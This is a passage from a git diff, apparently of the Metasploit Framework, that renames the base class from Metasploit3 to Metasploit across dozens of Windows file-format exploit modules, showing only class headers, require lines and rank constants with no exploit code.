Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index c38c4f6694..27c7ddfc8b 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb index 1a7ec7195a..757d29486c 100644 --- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb index a0786b7cfc..4bb35c4616 100644 --- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb +++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/ole' require 'rex/ole/util' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 7e68750c0f..087723a9e5 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb index be1f865651..22eaee8a22 100644 --- a/modules/exploits/windows/fileformat/ms12_005.rb +++ b/modules/exploits/windows/fileformat/ms12_005.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb index 52709c9794..3cabed1bd6 100644 --- a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb +++ b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index e524c4a34b..09cf163c39 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_017_rtf.rb b/modules/exploits/windows/fileformat/ms14_017_rtf.rb index 178fd02774..6826c4aa9c 100644 --- a/modules/exploits/windows/fileformat/ms14_017_rtf.rb +++ b/modules/exploits/windows/fileformat/ms14_017_rtf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb index 12a76d2f09..b2f579d334 100644 --- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb +++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index da08b259a5..73608729a3 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb index 2fae749a3d..f40eac4b91 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb index 66df942f10..fa50c07f1e 100644 --- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index 9815d96b34..a59e6bbe34 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index f0b5395668..fe08afb898 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 3715060fab..fd0e908a15 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -25,7 +25,7 @@ end end -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 91ec7bd6be..aff42f0083 100644 --- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb +++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb index 2de0c93213..e4aad84b4e 100644 --- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb +++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb index a16320bc27..999674ef33 100644 --- a/modules/exploits/windows/fileformat/netop.rb +++ b/modules/exploits/windows/fileformat/netop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb index 076e614bb2..2a2baca5a8 100644 --- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb +++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/openoffice_ole.rb b/modules/exploits/windows/fileformat/openoffice_ole.rb index ad26ef2fbd..48baa401b4 100644 --- a/modules/exploits/windows/fileformat/openoffice_ole.rb +++ b/modules/exploits/windows/fileformat/openoffice_ole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 75ed8cc4d3..157126e2e0 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb index dd958d8620..79e06e326a 100644 --- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb +++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb index 202fb38aba..92ed62510d 100644 --- a/modules/exploits/windows/fileformat/ovf_format_string.rb +++ b/modules/exploits/windows/fileformat/ovf_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb index fdd269942b..c5e505bd3b 100644 --- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/proshow_load_bof.rb b/modules/exploits/windows/fileformat/proshow_load_bof.rb index 7b5f803269..332310a977 100644 --- a/modules/exploits/windows/fileformat/proshow_load_bof.rb +++ b/modules/exploits/windows/fileformat/proshow_load_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/publishit_pui.rb b/modules/exploits/windows/fileformat/publishit_pui.rb index 6a260b10df..24c510ae2a 100644 --- a/modules/exploits/windows/fileformat/publishit_pui.rb +++ b/modules/exploits/windows/fileformat/publishit_pui.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb index 0c922c9fd1..6c11c1db5a 100644 --- a/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb +++ b/modules/exploits/windows/fileformat/real_networks_netzip_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb index 861ac3d898..73d73a064c 100644 --- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb index c3012abef6..08d8b91d74 100644 --- a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb +++ b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb index 51179b1675..ee40744bc2 100644 --- a/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb +++ b/modules/exploits/windows/fileformat/safenet_softremote_groupname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/sascam_get.rb b/modules/exploits/windows/fileformat/sascam_get.rb index 7dcc8d9617..c19ec3c972 100644 --- a/modules/exploits/windows/fileformat/sascam_get.rb +++ b/modules/exploits/windows/fileformat/sascam_get.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb index 23358f9ad6..83b6dcae99 100644 --- a/modules/exploits/windows/fileformat/scadaphone_zip.rb +++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb index a4676e030b..9cb7c70ce9 100644 --- a/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb +++ b/modules/exploits/windows/fileformat/shadow_stream_recorder_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/somplplayer_m3u.rb b/modules/exploits/windows/fileformat/somplplayer_m3u.rb index f4fb8022de..061c4a8a3c 100644 --- a/modules/exploits/windows/fileformat/somplplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/somplplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb index 1d79f124e1..f758571201 100644 --- a/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb index 476b0ed1ae..06a5cfa452 100644 --- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb +++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb index 736e5311c5..e191240543 100644 --- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb +++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/tugzip.rb b/modules/exploits/windows/fileformat/tugzip.rb index 5f822b0dae..9a32aea0ce 100644 --- a/modules/exploits/windows/fileformat/tugzip.rb +++ b/modules/exploits/windows/fileformat/tugzip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_ccd.rb b/modules/exploits/windows/fileformat/ultraiso_ccd.rb index 2ddbf829a4..f5c56d351d 100644 --- a/modules/exploits/windows/fileformat/ultraiso_ccd.rb +++ b/modules/exploits/windows/fileformat/ultraiso_ccd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ultraiso_cue.rb b/modules/exploits/windows/fileformat/ultraiso_cue.rb index 5c706c6424..42308fd594 100644 --- a/modules/exploits/windows/fileformat/ultraiso_cue.rb +++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 8c4f170b83..23be893138 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/varicad_dwb.rb b/modules/exploits/windows/fileformat/varicad_dwb.rb index c6bd57e032..d3a9a70204 100644 --- a/modules/exploits/windows/fileformat/varicad_dwb.rb +++ b/modules/exploits/windows/fileformat/varicad_dwb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videocharge_studio.rb b/modules/exploits/windows/fileformat/videocharge_studio.rb index 68cbfde4ef..f2be8d2285 100644 --- a/modules/exploits/windows/fileformat/videocharge_studio.rb +++ b/modules/exploits/windows/fileformat/videocharge_studio.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index 42b4cb395e..f38dea367a 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/videospirit_visprj.rb b/modules/exploits/windows/fileformat/videospirit_visprj.rb index 337be73d0c..bcd5989758 100644 --- a/modules/exploits/windows/fileformat/videospirit_visprj.rb +++ b/modules/exploits/windows/fileformat/videospirit_visprj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visio_dxf_bof.rb b/modules/exploits/windows/fileformat/visio_dxf_bof.rb index 0a35ce8bce..581f955edd 100644 --- a/modules/exploits/windows/fileformat/visio_dxf_bof.rb +++ b/modules/exploits/windows/fileformat/visio_dxf_bof.rb @@ -4,7 +4,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index b9474d67e7..25dc57ad07 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb index 0e83aa1d3e..ee16c22573 100644 --- a/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb +++ b/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_realtext.rb b/modules/exploits/windows/fileformat/vlc_realtext.rb index 4048200658..fed132db60 100644 --- a/modules/exploits/windows/fileformat/vlc_realtext.rb +++ b/modules/exploits/windows/fileformat/vlc_realtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index cab592fca2..43e8776f1b 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vlc_webm.rb b/modules/exploits/windows/fileformat/vlc_webm.rb index dac5f66d9a..18aec0b499 100644 --- a/modules/exploits/windows/fileformat/vlc_webm.rb +++ b/modules/exploits/windows/fileformat/vlc_webm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 6169941ed8..ce9ab77ee5 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index 4589c909f9..1364d0940e 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index af6a94c36b..094052559e 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index 0ee6a6a64b..9e45f10293 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb index 21385fe87f..23acce86d0 100644 --- a/modules/exploits/windows/fileformat/winrar_name_spoofing.rb +++ b/modules/exploits/windows/fileformat/winrar_name_spoofing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index 7727f18446..ded4c117c6 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb index 614d173074..2351581ad2 100644 --- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb +++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb index 0c6ee32cda..59073b55af 100644 --- a/modules/exploits/windows/fileformat/wm_downloader_m3u.rb +++ b/modules/exploits/windows/fileformat/wm_downloader_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb index e6f7b78680..7ee0266872 100644 --- a/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb +++ b/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb index 9e217df2a7..19a31f92b8 100644 --- a/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb +++ b/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb 